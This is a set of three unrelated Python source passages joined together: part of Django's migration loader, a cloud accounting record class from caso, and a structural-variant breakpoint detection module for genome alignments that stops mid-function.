        raise ValueError("Dependency on unknown app: %s" % key[0])
    def add_internal_dependencies(self, key, migration):
        """
        Internal dependencies need to be added first to ensure `__first__`
        dependencies find the correct root node.
        """
        for parent in migration.dependencies:
            # Ignore __first__ references to the same app.
            if parent[0] == key[0] and parent[1] != '__first__':
                self.graph.add_dependency(migration, key, parent, skip_validation=True)
    def add_external_dependencies(self, key, migration):
        """Add cross-app dependency and run_before edges for one migration."""
        for parent in migration.dependencies:
            # Skip internal dependencies
            if key[0] == parent[0]:
                continue
            parent = self.check_key(parent, key[0])
            if parent is not None:
                self.graph.add_dependency(migration, key, parent, skip_validation=True)
        for child in migration.run_before:
            child = self.check_key(child, key[0])
            if child is not None:
                # run_before reverses the edge direction: this migration
                # becomes a parent of "child".
                self.graph.add_dependency(migration, child, key, skip_validation=True)
    def build_graph(self):
        """
        Build a migration dependency graph using both the disk and database.
        You'll need to rebuild the graph if you apply migrations. This isn't
        usually a problem as generally migration stuff runs in a one-shot process.
        """
        # Load disk data
        self.load_disk()
        # Load database data
        if self.connection is None:
            self.applied_migrations = set()
        else:
            recorder = MigrationRecorder(self.connection)
            self.applied_migrations = recorder.applied_migrations()
        # To start, populate the migration graph with nodes for ALL migrations
        # and their dependencies. Also make note of replacing migrations at this step.
        self.graph = MigrationGraph()
        self.replacements = {}
        for key, migration in self.disk_migrations.items():
            self.graph.add_node(key, migration)
            # Replacing migrations.
            if migration.replaces:
                self.replacements[key] = migration
        for key, migration in self.disk_migrations.items():
            # Internal (same app) dependencies.
            self.add_internal_dependencies(key, migration)
        # Add external dependencies now that the internal ones have been resolved.
        for key, migration in self.disk_migrations.items():
            self.add_external_dependencies(key, migration)
        # Carry out replacements where possible.
        for key, migration in self.replacements.items():
            # Get applied status of each of this migration's replacement targets.
            applied_statuses = [(target in self.applied_migrations) for target in migration.replaces]
            # Ensure the replacing migration is only marked as applied if all of
            # its replacement targets are.
            if all(applied_statuses):
                self.applied_migrations.add(key)
            else:
                self.applied_migrations.discard(key)
            # A replacing migration can be used if either all or none of its
            # replacement targets have been applied.
            if all(applied_statuses) or (not any(applied_statuses)):
                self.graph.remove_replaced_nodes(key, migration.replaces)
            else:
                # This replacing migration cannot be used because it is partially applied.
                # Remove it from the graph and remap dependencies to it (#25945).
                self.graph.remove_replacement_node(key, migration.replaces)
        # Ensure the graph is consistent.
        try:
            self.graph.validate_consistency()
        except NodeNotFoundError as exc:
            # Check if the missing node could have been replaced by any squash
            # migration but wasn't because the squash migration was partially
            # applied before. In that case raise a more understandable exception
            # (#23556).
            # Get reverse replacements.
            reverse_replacements = {}
            for key, migration in self.replacements.items():
                for replaced in migration.replaces:
                    reverse_replacements.setdefault(replaced, set()).add(key)
            # Try to reraise exception with more detail.
            if exc.node in reverse_replacements:
                candidates = reverse_replacements.get(exc.node, set())
                is_replaced = any(candidate in self.graph.nodes for candidate in candidates)
                if not is_replaced:
                    tries = ', '.join('%s.%s' % c for c in candidates)
                    raise NodeNotFoundError(
                        "Migration {0} depends on nonexistent node ('{1}', '{2}'). "
                        "Django tried to replace migration {1}.{2} with any of [{3}] "
                        "but wasn't able to because some of the replaced migrations "
                        "are already applied.".format(
                            exc.origin, exc.node[0], exc.node[1], tries
                        ),
                        exc.node
                    ) from exc
            raise exc
        self.graph.ensure_not_cyclic()
    def check_consistent_history(self, connection):
        """
        Raise InconsistentMigrationHistory if any applied migrations have
        unapplied dependencies.
        """
        recorder = MigrationRecorder(connection)
        applied = recorder.applied_migrations()
        for migration in applied:
            # If the migration is unknown, skip it.
            if migration not in self.graph.nodes:
                continue
            for parent in self.graph.node_map[migration].parents:
                if parent not in applied:
                    # Skip unapplied squashed migrations that have all of their
                    # `replaces` applied.
                    if parent in self.replacements:
                        if all(m in applied for m in self.replacements[parent].replaces):
                            continue
                    raise InconsistentMigrationHistory(
                        "Migration {}.{} is applied before its dependency "
                        "{}.{} on database '{}'.".format(
                            migration[0], migration[1], parent[0], parent[1],
                            connection.alias,
                        )
                    )
    def detect_conflicts(self):
        """
        Look through the loaded graph and detect any conflicts - apps
        with more than one leaf migration. Return a dict of the app labels
        that conflict with the migration names that conflict.
        """
        seen_apps = {}
        conflicting_apps = set()
        for app_label, migration_name in self.graph.leaf_nodes():
            if app_label in seen_apps:
                conflicting_apps.add(app_label)
            seen_apps.setdefault(app_label, set()).add(migration_name)
        return {app_label: seen_apps[app_label] for app_label in conflicting_apps}
    def project_state(self, nodes=None, at_end=True):
        """
        Return a ProjectState object representing the most recent state
        that the loaded migrations represent.
        See graph.make_state() for the meaning of "nodes" and "at_end".
        """
        return self.graph.make_state(nodes=nodes, at_end=at_end, real_apps=list(self.unmigrated_apps))
| |
# -*- coding: utf-8 -*-
# Copyright 2014 Spanish National Research Council (CSIC)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import json
import pprint
import caso
from caso import exception
class CloudRecord(object):
    """The CloudRecord class holds information for each of the records.
    This class is versioned, following the Cloud Accounting Record versions.
    """
    # Version 0.2: initial version
    # Version 0.4: Add 0.4 fields
    version = "0.4"
    # Field names that make up version 0.2 of the accounting record.
    _v02_fields = [
        "VMUUID",
        "SiteName",
        "MachineName",
        "LocalUserId",
        "LocalGroupId",
        "GlobalUserName",
        "FQAN",
        "Status",
        "StartTime",
        "EndTime",
        "SuspendDuration",
        "WallDuration",
        "CpuDuration",
        "CpuCount",
        "NetworkType",
        "NetworkInbound",
        "NetworkOutbound",
        "Memory",
        "Disk",
        "StorageRecordId",
        "ImageId",
        "CloudType",
    ]
    # Version 0.4 is a strict superset of version 0.2.
    _v04_fields = _v02_fields + [
        "CloudComputeService",
        "BenchmarkType",
        "Benchmark",
        "PublicIPCount",
    ]
    # Maps a record version string to the fields included in that version.
    _version_field_map = {
        "0.2": _v02_fields,
        "0.4": _v04_fields,
    }
    def __init__(self, uuid, site, name, user_id, group_id, fqan,
                 status=None,
                 start_time=None, end_time=None,
                 suspend_duration=None, wall_duration=None, cpu_duration=None,
                 network_type=None, network_in=None, network_out=None,
                 cpu_count=None, memory=None, disk=None,
                 image_id=None, cloud_type=caso.user_agent,
                 storage_record_id=None,
                 vo=None, vo_group=None, vo_role=None,
                 user_dn=None,
                 compute_service=None,
                 benchmark_value=None, benchmark_type=None,
                 public_ip_count=None):
        """Populate the record fields.

        Timestamps and durations are routed through the property setters
        below, which validate types and can derive missing values.
        NOTE(review): vo, vo_group and vo_role are accepted but never
        stored on the instance — presumably superseded by fqan; confirm
        against callers before removing.
        """
        self.uuid = uuid
        self.site = site
        self.name = name
        self.user_id = user_id
        self.group_id = group_id
        self.fqan = fqan
        self.status = status
        self.start_time = start_time
        self.end_time = end_time
        self.suspend_duration = suspend_duration
        self.wall_duration = wall_duration
        self.cpu_duration = cpu_duration
        self.network_type = network_type
        self.network_in = network_in
        self.network_out = network_out
        self.cpu_count = cpu_count
        self.memory = memory
        self.disk = disk
        self.image_id = image_id
        self.cloud_type = cloud_type
        self.storage_record_id = storage_record_id
        self.user_dn = user_dn
        self.compute_service = compute_service
        self.benchmark_value = benchmark_value
        self.benchmark_type = benchmark_type
        self.public_ip_count = public_ip_count
    def __repr__(self):
        return pprint.pformat(self.as_dict())
    def as_dict(self, version=None):
        """Return CloudRecord as a dictionary.
        :param str version: optional, if passed it will format the record
                            according to that account record version
        :returns: A dict containing the record.
        :raises exception.RecordVersionNotFound: for unknown versions
        """
        if version is None:
            version = self.version
        if version not in self._version_field_map:
            raise exception.RecordVersionNotFound(version=version)
        return {k: v for k, v in self.map.items()
                if k in self._version_field_map[version]}
    @property
    def wall_duration(self):
        # An explicitly-set value wins; otherwise derive the duration from
        # the start/end timestamps when both are present.
        duration = None
        if self._wall_duration is not None:
            duration = self._wall_duration
        elif None not in (self._start_time, self._end_time):
            duration = (self.end_time - self.start_time).total_seconds()
        return int(duration) if duration is not None else None
    @wall_duration.setter
    def wall_duration(self, value):
        # NOTE(review): falsy values (e.g. 0) bypass the type check.
        if value and not isinstance(value, (int, float)):
            raise ValueError("Duration must be a number")
        self._wall_duration = value
    @property
    def cpu_duration(self):
        # An explicitly-set value wins; otherwise derive it as wall time
        # multiplied by the CPU count.
        duration = None
        if self._cpu_duration is not None:
            duration = self._cpu_duration
        elif self.wall_duration is not None and self.cpu_count:
            duration = self.wall_duration * self.cpu_count
        return int(duration) if duration is not None else None
    @cpu_duration.setter
    def cpu_duration(self, value):
        # NOTE(review): falsy values (e.g. 0) bypass the type check.
        if value and not isinstance(value, (int, float)):
            raise ValueError("Duration must be a number")
        self._cpu_duration = value
    @property
    def start_time(self):
        return self._start_time
    @start_time.setter
    def start_time(self, value):
        if value and not isinstance(value, datetime.datetime):
            raise ValueError("Dates must be datetime.datetime objects")
        self._start_time = value
    @property
    def end_time(self):
        return self._end_time
    @end_time.setter
    def end_time(self, value):
        if value and not isinstance(value, datetime.datetime):
            raise ValueError("Dates must be datetime.datetime objects")
        self._end_time = value
    @property
    def map(self):
        # Full mapping of accounting-record field names to current values;
        # as_dict() filters this down to one version's field list.
        # NOTE(review): strftime("%s") is a non-portable (glibc) extension,
        # presumably intended to emit a Unix timestamp — verify on target
        # platforms.
        d = {'VMUUID': self.uuid,
             'SiteName': self.site,
             'MachineName': self.name,
             'LocalUserId': self.user_id,
             'LocalGroupId': self.group_id,
             'FQAN': self.fqan,
             'Status': self.status,
             'StartTime': self.start_time and int(
                 self.start_time.strftime("%s")
             ),
             'EndTime': self.end_time and int(self.end_time.strftime("%s")),
             'SuspendDuration': self.suspend_duration,
             'WallDuration': self.wall_duration,
             'CpuDuration': self.cpu_duration,
             'CpuCount': self.cpu_count,
             'NetworkType': self.network_type,
             'NetworkInbound': self.network_in,
             'NetworkOutbound': self.network_out,
             'Memory': self.memory,
             'Disk': self.disk,
             'StorageRecordId': self.storage_record_id,
             'ImageId': self.image_id,
             'CloudType': self.cloud_type,
             'GlobalUserName': self.user_dn,
             'PublicIPCount': self.public_ip_count,
             'Benchmark': self.benchmark_value,
             'BenchmarkType': self.benchmark_type,
             'CloudComputeService': self.compute_service,
             }
        return d
    def as_json(self, version=None):
        """Return the record serialized as a JSON string."""
        return json.dumps(self.as_dict(version=version))
| |
from __future__ import print_function
import logging
import multiprocessing
from collections import defaultdict
import pybedtools
from defaults import MIN_INV_SUBALIGN_LENGTH, MIN_DEL_SUBALIGN_LENGTH,AGE_WINDOW_SIZE
logger = logging.getLogger(__name__)
def get_insertion_breakpoints(age_records, intervals, expected_bp_pos, window=AGE_WINDOW_SIZE, start=0, dist_to_expected_bp=50):
    """Find insertion breakpoints supported by the AGE alignment records.

    :param age_records: AGE alignment records used for support/counter-evidence
    :param intervals: (start, end) pairs of alignment intervals
    :param expected_bp_pos: (left, right) expected breakpoint positions
    :param window: maximum distance for two positions to be considered matching
    :param start: offset added to every reported breakpoint position
    :param dist_to_expected_bp: maximum allowed distance from an expected
                                breakpoint when more than one was gathered
    :returns: list of (position, insertion_length, insertion_sequence) tuples
    """
    func_logger = logging.getLogger("%s-%s" % (get_insertion_breakpoints.__name__, multiprocessing.current_process()))
    bedtools_intervals = [pybedtools.Interval("1", interval[0], interval[1]) for interval in sorted(intervals)]
    func_logger.info("bedtools_intervals %s" % (str(bedtools_intervals)))
    if not bedtools_intervals:
        return []
    # Candidate breakpoints are the distinct interval endpoints; the two
    # outermost ones are skipped since they border the alignment ends.
    potential_breakpoints = sorted(list(set(
        [interval.start for interval in bedtools_intervals] + [interval.end for interval in bedtools_intervals])))
    breakpoints = []
    for breakpoint in potential_breakpoints[1:-1]:
        # Check if the breakpoint is within window distance of a validated breakpoint
        if min([window + 1] + [abs(b[0] - breakpoint) for b in breakpoints]) <= window:
            continue
        func_logger.info("\tExamining potential breakpoint %d for support" % breakpoint)
        left_support = [interval[0] for interval in intervals if abs(interval[0] - breakpoint) <= window]
        right_support = [interval[1] for interval in intervals if abs(interval[1] - breakpoint) <= window]
        # Records with long reference flanks and only a small indel at this
        # position argue against a true insertion here.
        counter_examples = [age_record for age_record in age_records if age_record.has_long_ref_flanks() and (
            age_record.has_ref_deletion(window) or age_record.has_insertion(min_diff=20,
                                                                            max_diff=49)) and age_record.breakpoint_match(
            breakpoint, window)]
        if counter_examples:
            counter_example_ends = [age_record.start1_end1s for age_record in counter_examples]
            func_logger.info("\t\tSkipping breakpoint %d due to %s" % (breakpoint, str(counter_example_ends)))
            continue
        if left_support:
            func_logger.info("\t\tLeft support %s" % (str(left_support)))
        if right_support:
            func_logger.info("\t\tRight support %s" % (str(right_support)))
        if (left_support and right_support) and min(
                [window + 1] + [abs(b[0] - breakpoint) for b in breakpoints]) > window:
            both_support = [age_record for age_record in age_records if
                            age_record.has_insertion(min_diff=50, max_diff=1000000000) and age_record.breakpoint_match(
                                breakpoint, window)]
            if both_support:
                func_logger.info("\t\tboth_support = %s" % (str(both_support)))
                func_logger.info("\t\tinsertion lengths = %s" % (
                    str([age_record.insertion_length() for age_record in both_support])))
            insertion_length = max([0] + [age_record.insertion_length() for age_record in both_support])
            insertion_sequence = both_support[0].get_insertion_sequence() if both_support else "."
            func_logger.info("\t\tInsertion length = %d %s" % (insertion_length, insertion_sequence))
            breakpoints.append((breakpoint, insertion_length, insertion_sequence))
    func_logger.info("Nonfiltered breakpoints as %s" % (str(breakpoints)))
    if len(breakpoints) > 1:
        # Use a list comprehension instead of filter(): under Python 3,
        # filter() returns a lazy iterator, which would make the log line
        # below print "<filter object ...>" instead of the selected
        # breakpoints (behavior is identical under Python 2).
        breakpoints = [b for b in breakpoints
                       if min(abs(b[0] - expected_bp_pos[0]),
                              abs(expected_bp_pos[1] - b[0])) < dist_to_expected_bp]
    func_logger.info("Gathered breakpoints as %s" % (str(breakpoints)))
    return [(start + b[0], b[1], b[2]) for b in breakpoints]
def get_deletion_breakpoints(age_records, window=20, min_flank_length=50, start=0):
    """Compute deletion breakpoints supported by the AGE alignment records.

    Candidate positions are the end of each record's first sub-alignment and
    the start of its second; a candidate is kept when at least one record
    supports it within ``window`` and it is not within ``window`` of an
    already-kept breakpoint.
    """
    func_logger = logging.getLogger("%s-%s" % (get_deletion_breakpoints.__name__, multiprocessing.current_process()))
    left_ends = [record.start1_end1s[0][1] for record in age_records]
    right_starts = [record.start1_end1s[1][0] for record in age_records]
    breakpoints = []
    for candidate in sorted(left_ends + right_starts):
        has_left = any(abs(end - candidate) < window for end in left_ends)
        has_right = any(abs(begin - candidate) < window for begin in right_starts)
        far_enough = min([window + 1] + [abs(b - candidate) for b in breakpoints]) >= window
        if (has_left or has_right) and far_enough:
            breakpoints.append(candidate)
    func_logger.info("Gathered breakpoints as %s" % (str(breakpoints)))
    return [start + breakpoint for breakpoint in breakpoints]
def check_closeness_to_bp(pos, pad, dist_to_expected_bp, LR_bp, seq_length=0):
    """Return True if ``pos`` lies within ``dist_to_expected_bp`` of the
    expected breakpoint: ``pad`` for the left ('L') breakpoint, or
    ``seq_length - pad`` for the right one.
    """
    expected = pad if LR_bp == 'L' else seq_length - pad
    return abs(pos - expected) < dist_to_expected_bp
def get_inversion_breakpoints(age_records, window=20, min_endpoint_dist=10, start=0, pad=500, dist_to_expected_bp=400, min_inv_subalign_len=MIN_INV_SUBALIGN_LENGTH):
    """Derive inversion breakpoints from AGE alignment records.

    For each record, picks an "inverted" sub-alignment interval on seq1 whose
    ends sit near the expected breakpoints and a "normal" interval of opposite
    polarity, validates the shared boundary on both seq1 and seq2, and emits
    the two boundary positions.  Candidates closer than `window` to an already
    accepted breakpoint are merged.  Positions are returned offset by `start`.

    NOTE: this function relies on Python 2 semantics (filter/map return lists).

    Fixes vs. previous revision:
      * logger was named after get_deletion_breakpoints (copy-paste),
      * the long-inversion distance lambda referenced the leaked loop variable
        `i` instead of its own argument `x`,
      * picking the longest normal interval indexed the (interval, length)
        pairs with x[2] (IndexError); must be x[1].
    """
    func_logger = logging.getLogger("%s-%s" % (get_inversion_breakpoints.__name__, multiprocessing.current_process()))
    potential_breakpoints = []
    for age_record in age_records:
        # 0 where the two sequences agree in orientation, nonzero where inverted.
        polarities=[abs(age_record.polarities1[i]-age_record.polarities2[i]) for i in range(age_record.nfrags)]
        # Keep fragments long enough on both sequences, then drop those longer
        # than what the padded region could plausibly contain.
        good_intervals=[i for i in range(age_record.nfrags) if abs(age_record.start1_end1s[i][1]-age_record.start1_end1s[i][0]) > min_inv_subalign_len and abs(age_record.start2_end2s[i][1]-age_record.start2_end2s[i][0]) > min_inv_subalign_len]
        good_intervals=[i for i in good_intervals if abs(age_record.start1_end1s[i][1]-age_record.start1_end1s[i][0]) <= max(age_record.inputs[0].length-2*(pad-dist_to_expected_bp),pad+dist_to_expected_bp)]
        func_logger.info('Good intervals: %s'%str(good_intervals))
        if len(good_intervals)<2:
            func_logger.info('Not enough good interval for this age record: %s'%str(age_record))
            continue
        candidate_inv_intervals=[]
        inv_interval=-1
        long_inversion=False
        # Classify each good interval by which expected breakpoint its ends are near.
        left_end_near_l_bp=filter(lambda x: check_closeness_to_bp(min(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"L"), good_intervals)
        right_end_near_r_bp=filter(lambda x: check_closeness_to_bp(max(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"R",age_record.inputs[0].length), good_intervals)
        right_end_near_l_bp=filter(lambda x: check_closeness_to_bp(max(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"L"), good_intervals)
        left_end_near_r_bp=filter(lambda x: check_closeness_to_bp(min(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"R",age_record.inputs[0].length), good_intervals)
        candidate_inv_intervals=list(set(left_end_near_l_bp)&set(right_end_near_r_bp))
        candidate_norm_intervals=list(set(left_end_near_r_bp)|set(right_end_near_l_bp))
        if len(candidate_inv_intervals)>1 and len(candidate_norm_intervals)<=1:
            candidate_inv_intervals=list(set(candidate_inv_intervals)-set(candidate_norm_intervals))
        if len(candidate_inv_intervals)>1:
            dist_to_exp_bps=map(lambda x: abs(min(age_record.start1_end1s[x])-pad)+abs(max(age_record.start1_end1s[x])-(age_record.inputs[0].length-pad)),candidate_inv_intervals)
            # NOTE(review): this takes the position within candidate_inv_intervals,
            # not the interval id itself (candidate_inv_intervals[...]) — looks
            # suspicious but the same pattern is used consistently; confirm intent.
            inv_interval=min(enumerate(dist_to_exp_bps),key=lambda x:x[1])[0]
        elif len(candidate_inv_intervals)==1 :
            inv_interval=candidate_inv_intervals[0]
        if inv_interval==-1:
            #Potentially long inversion
            candidate_inv_intervals=[i for i in left_end_near_l_bp if ((set(candidate_norm_intervals)&set(left_end_near_r_bp))-set([i]))] + \
                                    [i for i in right_end_near_r_bp if ((set(candidate_norm_intervals)&set(right_end_near_l_bp))-set([i]))]
            if len(candidate_inv_intervals)>1:
                candidate_inv_intervals=[i for i in set(candidate_inv_intervals)&set(left_end_near_l_bp) if (pad< (sum(age_record.start1_end1s[i])/2.0))] + \
                                        [i for i in set(candidate_inv_intervals)&set(right_end_near_r_bp) if ((age_record.inputs[0].length-pad) > (sum(age_record.start1_end1s[i])/2.0))]
            if candidate_inv_intervals:
                func_logger.info('Potentially long-inversion interval: %s'%candidate_inv_intervals)
                long_inversion=True
                if len(candidate_inv_intervals)>1:
                    # BUGFIX: lambda previously tested `i` (leaked loop variable from
                    # the comprehensions above) instead of its own argument `x`.
                    dist_to_exp_bps=map(lambda x: abs(min(age_record.start1_end1s[x])-pad) if x in left_end_near_l_bp else abs(max(age_record.start1_end1s[x])-(age_record.inputs[0].length-pad)),candidate_inv_intervals)
                    inv_interval=min(enumerate(dist_to_exp_bps),key=lambda x:x[1])[0]
                else:
                    inv_interval=candidate_inv_intervals[0]
            elif age_record.inputs[0].length > ((2*pad+min_inv_subalign_len)):
                long_inversion=True
        if inv_interval==-1:
            func_logger.info('Not candidate inversion interval found for this age record: %s'%str(age_record))
            continue
        func_logger.info('age_record: %s'%str(age_record))
        func_logger.info('inverted interval: %s'%str(inv_interval))
        # The normal interval must have opposite polarity to the inverted one.
        candidate_norm_intervals=filter(lambda x: polarities[x]!=polarities[inv_interval], set(candidate_norm_intervals)-set([inv_interval]))
        if long_inversion and (inv_interval not in set(left_end_near_l_bp) & set(right_end_near_r_bp)) :
            candidate_norm_intervals=list(set(candidate_norm_intervals)&set(left_end_near_r_bp if (inv_interval in left_end_near_l_bp) else right_end_near_l_bp))
        if not candidate_norm_intervals:
            func_logger.info('Cannot find the normal interval for this age record: %s'%str(age_record))
            continue
        if len(candidate_norm_intervals)>1:
            # Prefer the longest normal interval.
            candidate_norm_intervals=map(lambda x: (x,abs(age_record.start1_end1s[x][0]-age_record.start1_end1s[x][1])),set(candidate_norm_intervals))
            # BUGFIX: the pairs are (interval, length); key was x[2] (IndexError).
            norm_interval,norm_length=max(candidate_norm_intervals,key=lambda x:x[1])
        else:
            norm_interval=candidate_norm_intervals[0]
        func_logger.info('norm_interval: %s'%str(norm_interval))
        s_inv=sorted(age_record.start1_end1s[inv_interval])
        s_norm=sorted(age_record.start1_end1s[norm_interval])
        if (s_norm[0]-s_inv[0])*(s_norm[1]-s_inv[1])<=0:
            func_logger.info('Bad intervals (one fully covers the other): %s'%str(age_record))
            continue
        if not long_inversion:
            interval=age_record.start2_end2s[inv_interval]
            # Short inversions: the inverted piece must not touch seq2's borders.
            if min([interval[0],abs(interval[0]-age_record.inputs[1].length),
                    interval[1],abs(interval[1]-age_record.inputs[1].length)]) < min_endpoint_dist:
                func_logger.info('Inverted interval end points are too close to borders in Seq2: %s'%str(age_record))
                continue
            if (((s_norm[1]>s_inv[1]) and ((s_inv[1]-s_norm[0])>10)) or ((s_norm[0]<s_inv[0]) and ((s_norm[1]-s_inv[0])>10))):
                func_logger.info('Bad middle bp in seq1 (covers>10): %s'%str(age_record))
                continue
            if (((s_norm[1]>s_inv[1]) and ((s_norm[0]-s_inv[1])>50)) or ((s_norm[0]<s_inv[0]) and ((s_inv[0]-s_norm[1])>50))):
                func_logger.info('Bad middle bp in seq1 (apart>50): %s'%str(age_record))
                continue
        # Shared boundary between the inverted and normal intervals, on seq1...
        bp_idx = 0 if (s_norm[1]>s_inv[1]) else 1
        bp1=s_inv[bp_idx]
        bp2=s_norm[bp_idx]
        # ...and the corresponding positions on seq2; they must agree closely.
        bp1_seq2=age_record.start2_end2s[inv_interval][filter(lambda x:age_record.start1_end1s[inv_interval][x]==bp1,[0,1])[0]]
        bp2_seq2=age_record.start2_end2s[norm_interval][filter(lambda x:age_record.start1_end1s[norm_interval][x]==bp2,[0,1])[0]]
        if abs(bp1_seq2-bp2_seq2)>10:
            func_logger.info('BPs do not match in seq2: %s'%str(age_record))
            continue
        potential_breakpoints += [bp1,bp2]
    potential_breakpoints=sorted(potential_breakpoints)
    breakpoints = []
    # Merge candidates closer than `window` to an already accepted breakpoint.
    for breakpoint in potential_breakpoints:
        if min([window + 1] + [abs(b - breakpoint) for b in breakpoints]) >= window:
            breakpoints.append(breakpoint)
    func_logger.info("Gathered breakpoints as %s" % (str(breakpoints)))
    return [start + breakpoint for breakpoint in breakpoints]
def get_duplication_breakpoints(age_records, window=20, max_endpoint_dist=10, start=0, pad=500, dist_to_expected_bp=400):
    """Derive tandem-duplication breakpoints from AGE alignment records.

    Expects records with exactly two seq1 fragments: one whose left end is near
    the expected left breakpoint (`pad`) and one whose right end is near the
    expected right breakpoint (`length - pad`).  The inner ends must agree on
    seq2 and the outer seq2 ends must be close to seq2's borders.  Candidates
    closer than `window` to an accepted breakpoint are merged; results are
    offset by `start`.

    NOTE: relies on Python 2 semantics (filter/map return lists).
    Fix vs. previous revision: the logger was named after
    get_deletion_breakpoints (copy-paste).
    """
    func_logger = logging.getLogger("%s-%s" % (get_duplication_breakpoints.__name__, multiprocessing.current_process()))
    potential_breakpoints = []
    for age_record in age_records:
        # Which of the two fragments sits near each expected breakpoint?
        left_end_near_l_bp=filter(lambda x: check_closeness_to_bp(min(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"L"), [0,1])
        right_end_near_r_bp=filter(lambda x: check_closeness_to_bp(max(age_record.start1_end1s[x]),pad,dist_to_expected_bp,"R",age_record.inputs[0].length), [0,1])
        if (not left_end_near_l_bp) or (not right_end_near_r_bp):
            func_logger.info('Not close to expected BPs: %s'%str(age_record))
            continue
        # Disambiguate so each side is claimed by exactly one fragment.
        if len(left_end_near_l_bp)==2 and len(right_end_near_r_bp)==1:
            left_end_near_l_bp = list(set(left_end_near_l_bp)-set(right_end_near_r_bp))
        elif len(left_end_near_l_bp)==1 and len(right_end_near_r_bp)==2:
            right_end_near_r_bp = list(set(right_end_near_r_bp)-set(left_end_near_l_bp))
        elif len(left_end_near_l_bp)==2 and len(right_end_near_r_bp)==2:
            # Both fragments qualify on both sides: pick the pairing with the
            # smaller total distance to the expected breakpoints.
            dist_to_exp_l_bp=map(lambda x: abs(min(age_record.start1_end1s[x])-pad),[0,1])
            dist_to_exp_r_bp=map(lambda x: abs(max(age_record.start1_end1s[x])-(age_record.inputs[0].length-pad)),[0,1])
            left_end_near_l_bp, right_end_near_r_bp = [[0],[1]] if (dist_to_exp_l_bp[0]+dist_to_exp_r_bp[1]) < (dist_to_exp_l_bp[1]+dist_to_exp_r_bp[0]) else [[1],[0]]
        l_interval = left_end_near_l_bp[0]
        r_interval = right_end_near_r_bp[0]
        # Index of the inner (breakpoint-side) end of each fragment on seq1.
        bp_idx_l = 0 if age_record.start1_end1s[l_interval][0]<age_record.start1_end1s[l_interval][1] else 1
        bp_idx_r = 1 if age_record.start1_end1s[r_interval][0]<age_record.start1_end1s[r_interval][1] else 0
        if abs(age_record.start2_end2s[l_interval][bp_idx_l]-age_record.start2_end2s[r_interval][bp_idx_r]) > 10:
            func_logger.info('BPs do not match in seq2: %s'%str(age_record))
            continue
        end_l_seq2 = age_record.start2_end2s[l_interval][1-bp_idx_l]
        end_r_seq2 = age_record.start2_end2s[r_interval][1-bp_idx_r]
        # Outer seq2 ends must hug seq2's borders (position 0 or length).
        if max(min(end_r_seq2,end_l_seq2),
               min(end_l_seq2-age_record.inputs[1].length,
                   end_r_seq2-age_record.inputs[1].length)) > max_endpoint_dist:
            func_logger.info('End points are too close to borders in Seq2: %s'%str(age_record))
            continue
        potential_breakpoints += [age_record.start1_end1s[l_interval][bp_idx_l],age_record.start1_end1s[r_interval][bp_idx_r]]
    potential_breakpoints=sorted(potential_breakpoints)
    breakpoints = []
    # Merge candidates closer than `window` to an already accepted breakpoint.
    for breakpoint in potential_breakpoints:
        if min([window + 1] + [abs(b - breakpoint) for b in breakpoints]) >= window:
            breakpoints.append(breakpoint)
    func_logger.info("Gathered breakpoints as %s" % (str(breakpoints)))
    return [start + breakpoint for breakpoint in breakpoints]
def get_reference_intervals(age_records, start=0, min_interval_len=100):
    """Collect seq1 alignment intervals at least `min_interval_len` long.

    Each qualifying (possibly reversed) interval is normalized to
    (low, high) and shifted by `start - 1`.  Order follows the records
    and their interval lists.
    """
    collected = []
    for rec in age_records:
        for iv in rec.start1_end1s:
            if abs(iv[0] - iv[1]) >= min_interval_len:
                collected.append((min(iv) + start - 1, max(iv) + start - 1))
    return collected
def process_age_records(age_records, sv_type="INS", ins_min_unaligned=10, min_interval_len=200, pad=500,
                        min_deletion_len=30, min_del_subalign_len=MIN_DEL_SUBALIGN_LENGTH,
                        min_inv_subalign_len=MIN_INV_SUBALIGN_LENGTH, dist_to_expected_bp=400,
                        age_window=AGE_WINDOW_SIZE, pad_ins=0, sc_locations=[]):
    """Filter AGE records for one SV type and derive its breakpoints.

    Applies per-SV-type quality filters to `age_records`, collects summary
    features into an info dict, dispatches to the type-specific breakpoint
    finder, and validates that the expected number of breakpoints was found.

    Returns a (breakpoints, info) pair; breakpoints is [] when the call is
    rejected at any stage.

    NOTE(review): `sc_locations=[]` is a mutable default; it is only rebound
    (never mutated) below, so it is currently harmless but fragile.
    """
    func_logger = logging.getLogger("%s-%s" % (process_age_records.__name__, multiprocessing.current_process()))
    good_age_records = age_records
    # --- Per-type filtering of the raw AGE records ---
    if sv_type == "INS":
        # Insertions need genuinely unaligned sequence and a non-reference call.
        good_age_records = [age_record for age_record in good_age_records if
                            not age_record.almost_all_bases_aligned(ins_min_unaligned)]
        good_age_records = [age_record for age_record in good_age_records if not age_record.is_reference()]
    elif sv_type == "DEL":
        # Deletions need exactly two well-supported flanking sub-alignments...
        good_age_records = [age_record for age_record in good_age_records if
                            len(age_record.start1_end1s) == 2 and min(age_record.ref_flanking_regions) >= min_del_subalign_len]
        # ...separated by at least min_deletion_len on the reference...
        good_age_records = [age_record for age_record in good_age_records if
                            abs(age_record.start1_end1s[0][1] - age_record.start1_end1s[1][0]) >= min_deletion_len]
        # ...with a good score relative to the flank length...
        good_age_records = [age_record for age_record in good_age_records if
                            float(age_record.score) / sum(age_record.ref_flanking_regions) >= 0.7]
        # ...and nearly adjacent on the assembled contig (seq2).
        good_age_records = [age_record for age_record in good_age_records if
                            abs(age_record.start2_end2s[0][1] - age_record.start2_end2s[1][0]) <= 50]
        # Both inner ends must lie near the expected breakpoint positions.
        good_age_records = [age_record for age_record in good_age_records if
                            check_closeness_to_bp(min(age_record.start1_end1s[0][1],
                                                      age_record.start1_end1s[1][0]),
                                                  pad,dist_to_expected_bp,"L") and
                            check_closeness_to_bp(max(age_record.start1_end1s[0][1],
                                                      age_record.start1_end1s[1][0]),
                                                  pad,dist_to_expected_bp,"R",
                                                  age_record.inputs[0].length)]
    elif sv_type == "INV":
